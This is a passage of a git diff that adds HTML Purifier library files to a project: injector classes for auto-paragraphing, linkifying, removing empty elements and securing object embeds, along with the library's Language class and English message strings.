=& $context->get('InputTokens'); + $this->inputIndex =& $context->get('InputIndex'); + return false; + } + + /** + * This function checks if the HTML environment + * will work with the Injector: if p tags are not allowed, the + * Auto-Paragraphing injector should not be enabled. + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @return Boolean false if success, string of missing needed element/attribute if failure + */ + public function checkNeeded($config) { + $def = $config->getHTMLDefinition(); + foreach ($this->needed as $element => $attributes) { + if (is_int($element)) $element = $attributes; + if (!isset($def->info[$element])) return $element; + if (!is_array($attributes)) continue; + foreach ($attributes as $name) { + if (!isset($def->info[$element]->attr[$name])) return "$element.$name"; + } + } + return false; + } + + /** + * Tests if the context node allows a certain element + * @param $name Name of element to test for + * @return True if element is allowed, false if it is not + */ + public function allowsElement($name) { + if (!empty($this->currentNesting)) { + $parent_token = array_pop($this->currentNesting); + $this->currentNesting[] = $parent_token; + $parent = $this->htmlDefinition->info[$parent_token->name]; + } else { + $parent = $this->htmlDefinition->info_parent_def; + } + if (!isset($parent->child->elements[$name]) || isset($parent->excludes[$name])) { + return false; + } + // check for exclusion + for ($i = count($this->currentNesting) - 2; $i >= 0; $i--) { + $node = $this->currentNesting[$i]; + $def = $this->htmlDefinition->info[$node->name]; + if (isset($def->excludes[$name])) return false; + } + return true; + } + + /** + * Iterator function, which starts with the next token and continues until + * you reach the end of the input tokens. + * @warning Please prevent previous references from interfering with this + * functions by setting $i = null beforehand! + * @param &$i Current integer index variable for inputTokens + * @param &$current Current token variable. Do NOT use $token, as that variable is also a reference + */ + protected function forward(&$i, &$current) { + if ($i === null) $i = $this->inputIndex + 1; + else $i++; + if (!isset($this->inputTokens[$i])) return false; + $current = $this->inputTokens[$i]; + return true; + } + + /** + * Similar to _forward, but accepts a third parameter $nesting (which + * should be initialized at 0) and stops when we hit the end tag + * for the node $this->inputIndex starts in. + */ + protected function forwardUntilEndToken(&$i, &$current, &$nesting) { + $result = $this->forward($i, $current); + if (!$result) return false; + if ($nesting === null) $nesting = 0; + if ($current instanceof HTMLPurifier_Token_Start) $nesting++; + elseif ($current instanceof HTMLPurifier_Token_End) { + if ($nesting <= 0) return false; + $nesting--; + } + return true; + } + + /** + * Iterator function, starts with the previous token and continues until + * you reach the beginning of input tokens. + * @warning Please prevent previous references from interfering with this + * functions by setting $i = null beforehand! + * @param &$i Current integer index variable for inputTokens + * @param &$current Current token variable. Do NOT use $token, as that variable is also a reference + */ + protected function backward(&$i, &$current) { + if ($i === null) $i = $this->inputIndex - 1; + else $i--; + if ($i < 0) return false; + $current = $this->inputTokens[$i]; + return true; + } + + /** + * Initializes the iterator at the current position. Use in a do {} while; + * loop to force the _forward and _backward functions to start at the + * current location. + * @warning Please prevent previous references from interfering with this + * functions by setting $i = null beforehand! + * @param &$i Current integer index variable for inputTokens + * @param &$current Current token variable. Do NOT use $token, as that variable is also a reference + */ + protected function current(&$i, &$current) { + if ($i === null) $i = $this->inputIndex; + $current = $this->inputTokens[$i]; + } + + /** + * Handler that is called when a text token is processed + */ + public function handleText(&$token) {} + + /** + * Handler that is called when a start or empty token is processed + */ + public function handleElement(&$token) {} + + /** + * Handler that is called when an end token is processed + */ + public function handleEnd(&$token) { + $this->notifyEnd($token); + } + + /** + * Notifier that is called when an end token is processed + * @note This differs from handlers in that the token is read-only + * @deprecated + */ + public function notifyEnd($token) {} + + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector/AutoParagraph.php b/lib/htmlpurifier/library/HTMLPurifier/Injector/AutoParagraph.php new file mode 100644 index 000000000..afa760892 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector/AutoParagraph.php @@ -0,0 +1,345 @@ +<?php + +/** + * Injector that auto paragraphs text in the root node based on + * double-spacing. + * @todo Ensure all states are unit tested, including variations as well. + * @todo Make a graph of the flow control for this Injector. + */ +class HTMLPurifier_Injector_AutoParagraph extends HTMLPurifier_Injector +{ + + public $name = 'AutoParagraph'; + public $needed = array('p'); + + private function _pStart() { + $par = new HTMLPurifier_Token_Start('p'); + $par->armor['MakeWellFormed_TagClosedError'] = true; + return $par; + } + + public function handleText(&$token) { + $text = $token->data; + // Does the current parent allow <p> tags? + if ($this->allowsElement('p')) { + if (empty($this->currentNesting) || strpos($text, "\n\n") !== false) { + // Note that we have differing behavior when dealing with text + // in the anonymous root node, or a node inside the document. + // If the text as a double-newline, the treatment is the same; + // if it doesn't, see the next if-block if you're in the document. + + $i = $nesting = null; + if (!$this->forwardUntilEndToken($i, $current, $nesting) && $token->is_whitespace) { + // State 1.1: ... ^ (whitespace, then document end) + // ---- + // This is a degenerate case + } else { + if (!$token->is_whitespace || $this->_isInline($current)) { + // State 1.2: PAR1 + // ---- + + // State 1.3: PAR1\n\nPAR2 + // ------------ + + // State 1.4: <div>PAR1\n\nPAR2 (see State 2) + // ------------ + $token = array($this->_pStart()); + $this->_splitText($text, $token); + } else { + // State 1.5: \n<hr /> + // -- + } + } + } else { + // State 2: <div>PAR1... (similar to 1.4) + // ---- + + // We're in an element that allows paragraph tags, but we're not + // sure if we're going to need them. + if ($this->_pLookAhead()) { + // State 2.1: <div>PAR1<b>PAR1\n\nPAR2 + // ---- + // Note: This will always be the first child, since any + // previous inline element would have triggered this very + // same routine, and found the double newline. One possible + // exception would be a comment. + $token = array($this->_pStart(), $token); + } else { + // State 2.2.1: <div>PAR1<div> + // ---- + + // State 2.2.2: <div>PAR1<b>PAR1</b></div> + // ---- + } + } + // Is the current parent a <p> tag? + } elseif ( + !empty($this->currentNesting) && + $this->currentNesting[count($this->currentNesting)-1]->name == 'p' + ) { + // State 3.1: ...<p>PAR1 + // ---- + + // State 3.2: ...<p>PAR1\n\nPAR2 + // ------------ + $token = array(); + $this->_splitText($text, $token); + // Abort! + } else { + // State 4.1: ...<b>PAR1 + // ---- + + // State 4.2: ...<b>PAR1\n\nPAR2 + // ------------ + } + } + + public function handleElement(&$token) { + // We don't have to check if we're already in a <p> tag for block + // tokens, because the tag would have been autoclosed by MakeWellFormed. + if ($this->allowsElement('p')) { + if (!empty($this->currentNesting)) { + if ($this->_isInline($token)) { + // State 1: <div>...<b> + // --- + + // Check if this token is adjacent to the parent token + // (seek backwards until token isn't whitespace) + $i = null; + $this->backward($i, $prev); + + if (!$prev instanceof HTMLPurifier_Token_Start) { + // Token wasn't adjacent + + if ( + $prev instanceof HTMLPurifier_Token_Text && + substr($prev->data, -2) === "\n\n" + ) { + // State 1.1.4: <div><p>PAR1</p>\n\n<b> + // --- + + // Quite frankly, this should be handled by splitText + $token = array($this->_pStart(), $token); + } else { + // State 1.1.1: <div><p>PAR1</p><b> + // --- + + // State 1.1.2: <div><br /><b> + // --- + + // State 1.1.3: <div>PAR<b> + // --- + } + + } else { + // State 1.2.1: <div><b> + // --- + + // Lookahead to see if <p> is needed. + if ($this->_pLookAhead()) { + // State 1.3.1: <div><b>PAR1\n\nPAR2 + // --- + $token = array($this->_pStart(), $token); + } else { + // State 1.3.2: <div><b>PAR1</b></div> + // --- + + // State 1.3.3: <div><b>PAR1</b><div></div>\n\n</div> + // --- + } + } + } else { + // State 2.3: ...<div> + // ----- + } + } else { + if ($this->_isInline($token)) { + // State 3.1: <b> + // --- + // This is where the {p} tag is inserted, not reflected in + // inputTokens yet, however. + $token = array($this->_pStart(), $token); + } else { + // State 3.2: <div> + // ----- + } + + $i = null; + if ($this->backward($i, $prev)) { + if ( + !$prev instanceof HTMLPurifier_Token_Text + ) { + // State 3.1.1: ...</p>{p}<b> + // --- + + // State 3.2.1: ...</p><div> + // ----- + + if (!is_array($token)) $token = array($token); + array_unshift($token, new HTMLPurifier_Token_Text("\n\n")); + } else { + // State 3.1.2: ...</p>\n\n{p}<b> + // --- + + // State 3.2.2: ...</p>\n\n<div> + // ----- + + // Note: PAR<ELEM> cannot occur because PAR would have been + // wrapped in <p> tags. + } + } + } + } else { + // State 2.2: <ul><li> + // ---- + + // State 2.4: <p><b> + // --- + } + } + + /** + * Splits up a text in paragraph tokens and appends them + * to the result stream that will replace the original + * @param $data String text data that will be processed + * into paragraphs + * @param $result Reference to array of tokens that the + * tags will be appended onto + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + */ + private function _splitText($data, &$result) { + $raw_paragraphs = explode("\n\n", $data); + $paragraphs = array(); // without empty paragraphs + $needs_start = false; + $needs_end = false; + + $c = count($raw_paragraphs); + if ($c == 1) { + // There were no double-newlines, abort quickly. In theory this + // should never happen. + $result[] = new HTMLPurifier_Token_Text($data); + return; + } + for ($i = 0; $i < $c; $i++) { + $par = $raw_paragraphs[$i]; + if (trim($par) !== '') { + $paragraphs[] = $par; + } else { + if ($i == 0) { + // Double newline at the front + if (empty($result)) { + // The empty result indicates that the AutoParagraph + // injector did not add any start paragraph tokens. + // This means that we have been in a paragraph for + // a while, and the newline means we should start a new one. + $result[] = new HTMLPurifier_Token_End('p'); + $result[] = new HTMLPurifier_Token_Text("\n\n"); + // However, the start token should only be added if + // there is more processing to be done (i.e. there are + // real paragraphs in here). If there are none, the + // next start paragraph tag will be handled by the + // next call to the injector + $needs_start = true; + } else { + // We just started a new paragraph! + // Reinstate a double-newline for presentation's sake, since + // it was in the source code. + array_unshift($result, new HTMLPurifier_Token_Text("\n\n")); + } + } elseif ($i + 1 == $c) { + // Double newline at the end + // There should be a trailing </p> when we're finally done. + $needs_end = true; + } + } + } + + // Check if this was just a giant blob of whitespace. Move this earlier, + // perhaps? + if (empty($paragraphs)) { + return; + } + + // Add the start tag indicated by \n\n at the beginning of $data + if ($needs_start) { + $result[] = $this->_pStart(); + } + + // Append the paragraphs onto the result + foreach ($paragraphs as $par) { + $result[] = new HTMLPurifier_Token_Text($par); + $result[] = new HTMLPurifier_Token_End('p'); + $result[] = new HTMLPurifier_Token_Text("\n\n"); + $result[] = $this->_pStart(); + } + + // Remove trailing start token; Injector will handle this later if + // it was indeed needed. This prevents from needing to do a lookahead, + // at the cost of a lookbehind later. + array_pop($result); + + // If there is no need for an end tag, remove all of it and let + // MakeWellFormed close it later. + if (!$needs_end) { + array_pop($result); // removes \n\n + array_pop($result); // removes </p> + } + + } + + /** + * Returns true if passed token is inline (and, ergo, allowed in + * paragraph tags) + */ + private function _isInline($token) { + return isset($this->htmlDefinition->info['p']->child->elements[$token->name]); + } + + /** + * Looks ahead in the token list and determines whether or not we need + * to insert a <p> tag. + */ + private function _pLookAhead() { + $this->current($i, $current); + if ($current instanceof HTMLPurifier_Token_Start) $nesting = 1; + else $nesting = 0; + $ok = false; + while ($this->forwardUntilEndToken($i, $current, $nesting)) { + $result = $this->_checkNeedsP($current); + if ($result !== null) { + $ok = $result; + break; + } + } + return $ok; + } + + /** + * Determines if a particular token requires an earlier inline token + * to get a paragraph. This should be used with _forwardUntilEndToken + */ + private function _checkNeedsP($current) { + if ($current instanceof HTMLPurifier_Token_Start){ + if (!$this->_isInline($current)) { + // <div>PAR1<div> + // ---- + // Terminate early, since we hit a block element + return false; + } + } elseif ($current instanceof HTMLPurifier_Token_Text) { + if (strpos($current->data, "\n\n") !== false) { + // <div>PAR1<b>PAR1\n\nPAR2 + // ---- + return true; + } else { + // <div>PAR1<b>PAR1... + // ---- + } + } + return null; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector/DisplayLinkURI.php b/lib/htmlpurifier/library/HTMLPurifier/Injector/DisplayLinkURI.php new file mode 100644 index 000000000..9dce9bd08 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector/DisplayLinkURI.php @@ -0,0 +1,26 @@ +<?php + +/** + * Injector that displays the URL of an anchor instead of linking to it, in addition to showing the text of the link. + */ +class HTMLPurifier_Injector_DisplayLinkURI extends HTMLPurifier_Injector +{ + + public $name = 'DisplayLinkURI'; + public $needed = array('a'); + + public function handleElement(&$token) { + } + + public function handleEnd(&$token) { + if (isset($token->start->attr['href'])){ + $url = $token->start->attr['href']; + unset($token->start->attr['href']); + $token = array($token, new HTMLPurifier_Token_Text(" ($url)")); + } else { + // nothing to display + } + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector/Linkify.php b/lib/htmlpurifier/library/HTMLPurifier/Injector/Linkify.php new file mode 100644 index 000000000..296dac282 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector/Linkify.php @@ -0,0 +1,46 @@ +<?php + +/** + * Injector that converts http, https and ftp text URLs to actual links. + */ +class HTMLPurifier_Injector_Linkify extends HTMLPurifier_Injector +{ + + public $name = 'Linkify'; + public $needed = array('a' => array('href')); + + public function handleText(&$token) { + if (!$this->allowsElement('a')) return; + + if (strpos($token->data, '://') === false) { + // our really quick heuristic failed, abort + // this may not work so well if we want to match things like + // "google.com", but then again, most people don't + return; + } + + // there is/are URL(s). Let's split the string: + // Note: this regex is extremely permissive + $bits = preg_split('#((?:https?|ftp)://[^\s\'"<>()]+)#S', $token->data, -1, PREG_SPLIT_DELIM_CAPTURE); + + $token = array(); + + // $i = index + // $c = count + // $l = is link + for ($i = 0, $c = count($bits), $l = false; $i < $c; $i++, $l = !$l) { + if (!$l) { + if ($bits[$i] === '') continue; + $token[] = new HTMLPurifier_Token_Text($bits[$i]); + } else { + $token[] = new HTMLPurifier_Token_Start('a', array('href' => $bits[$i])); + $token[] = new HTMLPurifier_Token_Text($bits[$i]); + $token[] = new HTMLPurifier_Token_End('a'); + } + } + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector/PurifierLinkify.php b/lib/htmlpurifier/library/HTMLPurifier/Injector/PurifierLinkify.php new file mode 100644 index 000000000..ad2455a91 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector/PurifierLinkify.php @@ -0,0 +1,45 @@ +<?php + +/** + * Injector that converts configuration directive syntax %Namespace.Directive + * to links + */ +class HTMLPurifier_Injector_PurifierLinkify extends HTMLPurifier_Injector +{ + + public $name = 'PurifierLinkify'; + public $docURL; + public $needed = array('a' => array('href')); + + public function prepare($config, $context) { + $this->docURL = $config->get('AutoFormat.PurifierLinkify.DocURL'); + return parent::prepare($config, $context); + } + + public function handleText(&$token) { + if (!$this->allowsElement('a')) return; + if (strpos($token->data, '%') === false) return; + + $bits = preg_split('#%([a-z0-9]+\.[a-z0-9]+)#Si', $token->data, -1, PREG_SPLIT_DELIM_CAPTURE); + $token = array(); + + // $i = index + // $c = count + // $l = is link + for ($i = 0, $c = count($bits), $l = false; $i < $c; $i++, $l = !$l) { + if (!$l) { + if ($bits[$i] === '') continue; + $token[] = new HTMLPurifier_Token_Text($bits[$i]); + } else { + $token[] = new HTMLPurifier_Token_Start('a', + array('href' => str_replace('%s', $bits[$i], $this->docURL))); + $token[] = new HTMLPurifier_Token_Text('%' . $bits[$i]); + $token[] = new HTMLPurifier_Token_End('a'); + } + } + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector/RemoveEmpty.php b/lib/htmlpurifier/library/HTMLPurifier/Injector/RemoveEmpty.php new file mode 100644 index 000000000..638bfca03 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector/RemoveEmpty.php @@ -0,0 +1,51 @@ +<?php + +class HTMLPurifier_Injector_RemoveEmpty extends HTMLPurifier_Injector +{ + + private $context, $config, $attrValidator, $removeNbsp, $removeNbspExceptions; + + public function prepare($config, $context) { + parent::prepare($config, $context); + $this->config = $config; + $this->context = $context; + $this->removeNbsp = $config->get('AutoFormat.RemoveEmpty.RemoveNbsp'); + $this->removeNbspExceptions = $config->get('AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions'); + $this->attrValidator = new HTMLPurifier_AttrValidator(); + } + + public function handleElement(&$token) { + if (!$token instanceof HTMLPurifier_Token_Start) return; + $next = false; + for ($i = $this->inputIndex + 1, $c = count($this->inputTokens); $i < $c; $i++) { + $next = $this->inputTokens[$i]; + if ($next instanceof HTMLPurifier_Token_Text) { + if ($next->is_whitespace) continue; + if ($this->removeNbsp && !isset($this->removeNbspExceptions[$token->name])) { + $plain = str_replace("\xC2\xA0", "", $next->data); + $isWsOrNbsp = $plain === '' || ctype_space($plain); + if ($isWsOrNbsp) continue; + } + } + break; + } + if (!$next || ($next instanceof HTMLPurifier_Token_End && $next->name == $token->name)) { + if ($token->name == 'colgroup') return; + $this->attrValidator->validateToken($token, $this->config, $this->context); + $token->armor['ValidateAttributes'] = true; + if (isset($token->attr['id']) || isset($token->attr['name'])) return; + $token = $i - $this->inputIndex + 1; + for ($b = $this->inputIndex - 1; $b > 0; $b--) { + $prev = $this->inputTokens[$b]; + if ($prev instanceof HTMLPurifier_Token_Text && $prev->is_whitespace) continue; + break; + } + // This is safe because we removed the token that triggered this. + $this->rewind($b - 1); + return; + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector/RemoveSpansWithoutAttributes.php b/lib/htmlpurifier/library/HTMLPurifier/Injector/RemoveSpansWithoutAttributes.php new file mode 100644 index 000000000..b21313470 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector/RemoveSpansWithoutAttributes.php @@ -0,0 +1,60 @@ +<?php + +/** + * Injector that removes spans with no attributes + */ +class HTMLPurifier_Injector_RemoveSpansWithoutAttributes extends HTMLPurifier_Injector +{ + public $name = 'RemoveSpansWithoutAttributes'; + public $needed = array('span'); + + private $attrValidator; + + /** + * Used by AttrValidator + */ + private $config; + private $context; + + public function prepare($config, $context) { + $this->attrValidator = new HTMLPurifier_AttrValidator(); + $this->config = $config; + $this->context = $context; + return parent::prepare($config, $context); + } + + public function handleElement(&$token) { + if ($token->name !== 'span' || !$token instanceof HTMLPurifier_Token_Start) { + return; + } + + // We need to validate the attributes now since this doesn't normally + // happen until after MakeWellFormed. If all the attributes are removed + // the span needs to be removed too. + $this->attrValidator->validateToken($token, $this->config, $this->context); + $token->armor['ValidateAttributes'] = true; + + if (!empty($token->attr)) { + return; + } + + $nesting = 0; + $spanContentTokens = array(); + while ($this->forwardUntilEndToken($i, $current, $nesting)) {} + + if ($current instanceof HTMLPurifier_Token_End && $current->name === 'span') { + // Mark closing span tag for deletion + $current->markForDeletion = true; + // Delete open span tag + $token = false; + } + } + + public function handleEnd(&$token) { + if ($token->markForDeletion) { + $token = false; + } + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector/SafeObject.php b/lib/htmlpurifier/library/HTMLPurifier/Injector/SafeObject.php new file mode 100644 index 000000000..c1d8b0412 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector/SafeObject.php @@ -0,0 +1,91 @@ +<?php + +/** + * Adds important param elements to inside of object in order to make + * things safe. + */ +class HTMLPurifier_Injector_SafeObject extends HTMLPurifier_Injector +{ + public $name = 'SafeObject'; + public $needed = array('object', 'param'); + + protected $objectStack = array(); + protected $paramStack = array(); + + // Keep this synchronized with AttrTransform/SafeParam.php + protected $addParam = array( + 'allowScriptAccess' => 'never', + 'allowNetworking' => 'internal', + ); + protected $allowedParam = array( + 'wmode' => true, + 'movie' => true, + 'flashvars' => true, + 'src' => true, + 'allowFullScreen' => true, // if omitted, assume to be 'false' + ); + + public function prepare($config, $context) { + parent::prepare($config, $context); + } + + public function handleElement(&$token) { + if ($token->name == 'object') { + $this->objectStack[] = $token; + $this->paramStack[] = array(); + $new = array($token); + foreach ($this->addParam as $name => $value) { + $new[] = new HTMLPurifier_Token_Empty('param', array('name' => $name, 'value' => $value)); + } + $token = $new; + } elseif ($token->name == 'param') { + $nest = count($this->currentNesting) - 1; + if ($nest >= 0 && $this->currentNesting[$nest]->name === 'object') { + $i = count($this->objectStack) - 1; + if (!isset($token->attr['name'])) { + $token = false; + return; + } + $n = $token->attr['name']; + // We need this fix because YouTube doesn't supply a data + // attribute, which we need if a type is specified. This is + // *very* Flash specific. + if (!isset($this->objectStack[$i]->attr['data']) && + ($token->attr['name'] == 'movie' || $token->attr['name'] == 'src')) { + $this->objectStack[$i]->attr['data'] = $token->attr['value']; + } + // Check if the parameter is the correct value but has not + // already been added + if ( + !isset($this->paramStack[$i][$n]) && + isset($this->addParam[$n]) && + $token->attr['name'] === $this->addParam[$n] + ) { + // keep token, and add to param stack + $this->paramStack[$i][$n] = true; + } elseif (isset($this->allowedParam[$n])) { + // keep token, don't do anything to it + // (could possibly check for duplicates here) + } else { + $token = false; + } + } else { + // not directly inside an object, DENY! + $token = false; + } + } + } + + public function handleEnd(&$token) { + // This is the WRONG way of handling the object and param stacks; + // we should be inserting them directly on the relevant object tokens + // so that the global stack handling handles it. + if ($token->name == 'object') { + array_pop($this->objectStack); + array_pop($this->paramStack); + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Language.php b/lib/htmlpurifier/library/HTMLPurifier/Language.php new file mode 100644 index 000000000..3e2be03b5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Language.php @@ -0,0 +1,163 @@ +<?php + +/** + * Represents a language and defines localizable string formatting and + * other functions, as well as the localized messages for HTML Purifier. + */ +class HTMLPurifier_Language +{ + + /** + * ISO 639 language code of language. Prefers shortest possible version + */ + public $code = 'en'; + + /** + * Fallback language code + */ + public $fallback = false; + + /** + * Array of localizable messages + */ + public $messages = array(); + + /** + * Array of localizable error codes + */ + public $errorNames = array(); + + /** + * True if no message file was found for this language, so English + * is being used instead. Check this if you'd like to notify the + * user that they've used a non-supported language. + */ + public $error = false; + + /** + * Has the language object been loaded yet? + * @todo Make it private, fix usage in HTMLPurifier_LanguageTest + */ + public $_loaded = false; + + /** + * Instances of HTMLPurifier_Config and HTMLPurifier_Context + */ + protected $config, $context; + + public function __construct($config, $context) { + $this->config = $config; + $this->context = $context; + } + + /** + * Loads language object with necessary info from factory cache + * @note This is a lazy loader + */ + public function load() { + if ($this->_loaded) return; + $factory = HTMLPurifier_LanguageFactory::instance(); + $factory->loadLanguage($this->code); + foreach ($factory->keys as $key) { + $this->$key = $factory->cache[$this->code][$key]; + } + $this->_loaded = true; + } + + /** + * Retrieves a localised message. + * @param $key string identifier of message + * @return string localised message + */ + public function getMessage($key) { + if (!$this->_loaded) $this->load(); + if (!isset($this->messages[$key])) return "[$key]"; + return $this->messages[$key]; + } + + /** + * Retrieves a localised error name. + * @param $int integer error number, corresponding to PHP's error + * reporting + * @return string localised message + */ + public function getErrorName($int) { + if (!$this->_loaded) $this->load(); + if (!isset($this->errorNames[$int])) return "[Error: $int]"; + return $this->errorNames[$int]; + } + + /** + * Converts an array list into a string readable representation + */ + public function listify($array) { + $sep = $this->getMessage('Item separator'); + $sep_last = $this->getMessage('Item separator last'); + $ret = ''; + for ($i = 0, $c = count($array); $i < $c; $i++) { + if ($i == 0) { + } elseif ($i + 1 < $c) { + $ret .= $sep; + } else { + $ret .= $sep_last; + } + $ret .= $array[$i]; + } + return $ret; + } + + /** + * Formats a localised message with passed parameters + * @param $key string identifier of message + * @param $args Parameters to substitute in + * @return string localised message + * @todo Implement conditionals? Right now, some messages make + * reference to line numbers, but those aren't always available + */ + public function formatMessage($key, $args = array()) { + if (!$this->_loaded) $this->load(); + if (!isset($this->messages[$key])) return "[$key]"; + $raw = $this->messages[$key]; + $subst = array(); + $generator = false; + foreach ($args as $i => $value) { + if (is_object($value)) { + if ($value instanceof HTMLPurifier_Token) { + // factor this out some time + if (!$generator) $generator = $this->context->get('Generator'); + if (isset($value->name)) $subst['$'.$i.'.Name'] = $value->name; + if (isset($value->data)) $subst['$'.$i.'.Data'] = $value->data; + $subst['$'.$i.'.Compact'] = + $subst['$'.$i.'.Serialized'] = $generator->generateFromToken($value); + // a more complex algorithm for compact representation + // could be introduced for all types of tokens. This + // may need to be factored out into a dedicated class + if (!empty($value->attr)) { + $stripped_token = clone $value; + $stripped_token->attr = array(); + $subst['$'.$i.'.Compact'] = $generator->generateFromToken($stripped_token); + } + $subst['$'.$i.'.Line'] = $value->line ? $value->line : 'unknown'; + } + continue; + } elseif (is_array($value)) { + $keys = array_keys($value); + if (array_keys($keys) === $keys) { + // list + $subst['$'.$i] = $this->listify($value); + } else { + // associative array + // no $i implementation yet, sorry + $subst['$'.$i.'.Keys'] = $this->listify($keys); + $subst['$'.$i.'.Values'] = $this->listify(array_values($value)); + } + continue; + } + $subst['$' . $i] = $value; + } + return strtr($raw, $subst); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Language/classes/en-x-test.php b/lib/htmlpurifier/library/HTMLPurifier/Language/classes/en-x-test.php new file mode 100644 index 000000000..d52fcb7ac --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Language/classes/en-x-test.php @@ -0,0 +1,12 @@ +<?php + +// private class for unit testing + +class HTMLPurifier_Language_en_x_test extends HTMLPurifier_Language +{ + + + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en-x-test.php b/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en-x-test.php new file mode 100644 index 000000000..1c046f379 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en-x-test.php @@ -0,0 +1,11 @@ +<?php + +// private language message file for unit testing purposes + +$fallback = 'en'; + +$messages = array( + 'HTMLPurifier' => 'HTML Purifier X' +); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en-x-testmini.php b/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en-x-testmini.php new file mode 100644 index 000000000..806c83fbf --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en-x-testmini.php @@ -0,0 +1,12 @@ +<?php + +// private language message file for unit testing purposes +// this language file has no class associated with it + +$fallback = 'en'; + +$messages = array( + 'HTMLPurifier' => 'HTML Purifier XNone' +); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en.php b/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en.php new file mode 100644 index 000000000..8d7b5736b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Language/messages/en.php @@ -0,0 +1,63 @@ +<?php + +$fallback = false; + +$messages = array( + +'HTMLPurifier' => 'HTML Purifier', + +// for unit testing purposes +'LanguageFactoryTest: Pizza' => 'Pizza', +'LanguageTest: List' => '$1', +'LanguageTest: Hash' => '$1.Keys; $1.Values', + +'Item separator' => ', ', +'Item separator last' => ' and ', // non-Harvard style + +'ErrorCollector: No errors' => 'No errors detected. However, because error reporting is still incomplete, there may have been errors that the error collector was not notified of; please inspect the output HTML carefully.', +'ErrorCollector: At line' => ' at line $line', +'ErrorCollector: Incidental errors' => 'Incidental errors', + +'Lexer: Unclosed comment' => 'Unclosed comment', +'Lexer: Unescaped lt' => 'Unescaped less-than sign (<) should be <', +'Lexer: Missing gt' => 'Missing greater-than sign (>), previous less-than sign (<) should be escaped', +'Lexer: Missing attribute key' => 'Attribute declaration has no key', +'Lexer: Missing end quote' => 'Attribute declaration has no end quote', +'Lexer: Extracted body' => 'Removed document metadata tags', + +'Strategy_RemoveForeignElements: Tag transform' => '<$1> element transformed into $CurrentToken.Serialized', +'Strategy_RemoveForeignElements: Missing required attribute' => '$CurrentToken.Compact element missing required attribute $1', +'Strategy_RemoveForeignElements: Foreign element to text' => 'Unrecognized $CurrentToken.Serialized tag converted to text', +'Strategy_RemoveForeignElements: Foreign element removed' => 'Unrecognized $CurrentToken.Serialized tag removed', +'Strategy_RemoveForeignElements: Comment removed' => 'Comment containing "$CurrentToken.Data" removed', +'Strategy_RemoveForeignElements: Foreign meta element removed' => 'Unrecognized $CurrentToken.Serialized meta tag and all descendants removed', +'Strategy_RemoveForeignElements: Token removed to end' => 'Tags and text starting from $1 element where removed to end', +'Strategy_RemoveForeignElements: Trailing hyphen in comment removed' => 'Trailing hyphen(s) in comment removed', +'Strategy_RemoveForeignElements: Hyphens in comment collapsed' => 'Double hyphens in comments are not allowed, and were collapsed into single hyphens', + +'Strategy_MakeWellFormed: Unnecessary end tag removed' => 'Unnecessary $CurrentToken.Serialized tag removed', +'Strategy_MakeWellFormed: Unnecessary end tag to text' => 'Unnecessary $CurrentToken.Serialized tag converted to text', +'Strategy_MakeWellFormed: Tag auto closed' => '$1.Compact started on line $1.Line auto-closed by $CurrentToken.Compact', +'Strategy_MakeWellFormed: Tag carryover' => '$1.Compact started on line $1.Line auto-continued into $CurrentToken.Compact', +'Strategy_MakeWellFormed: Stray end tag removed' => 'Stray $CurrentToken.Serialized tag removed', +'Strategy_MakeWellFormed: Stray end tag to text' => 'Stray $CurrentToken.Serialized tag converted to text', +'Strategy_MakeWellFormed: Tag closed by element end' => '$1.Compact tag started on line $1.Line closed by end of $CurrentToken.Serialized', +'Strategy_MakeWellFormed: Tag closed by document end' => '$1.Compact tag started on line $1.Line closed by end of document', + +'Strategy_FixNesting: Node removed' => '$CurrentToken.Compact node removed', +'Strategy_FixNesting: Node excluded' => '$CurrentToken.Compact node removed due to descendant exclusion by ancestor element', +'Strategy_FixNesting: Node reorganized' => 'Contents of $CurrentToken.Compact node reorganized to enforce its content model', +'Strategy_FixNesting: Node contents removed' => 'Contents of $CurrentToken.Compact node removed', + +'AttrValidator: Attributes transformed' => 'Attributes on $CurrentToken.Compact transformed from $1.Keys to $2.Keys', +'AttrValidator: Attribute removed' => '$CurrentAttr.Name attribute on $CurrentToken.Compact removed', + +); + +$errorNames = array( + E_ERROR => 'Error', + E_WARNING => 'Warning', + E_NOTICE => 'Notice' +); + +// vim: et sw=4 sts=4 diff --git 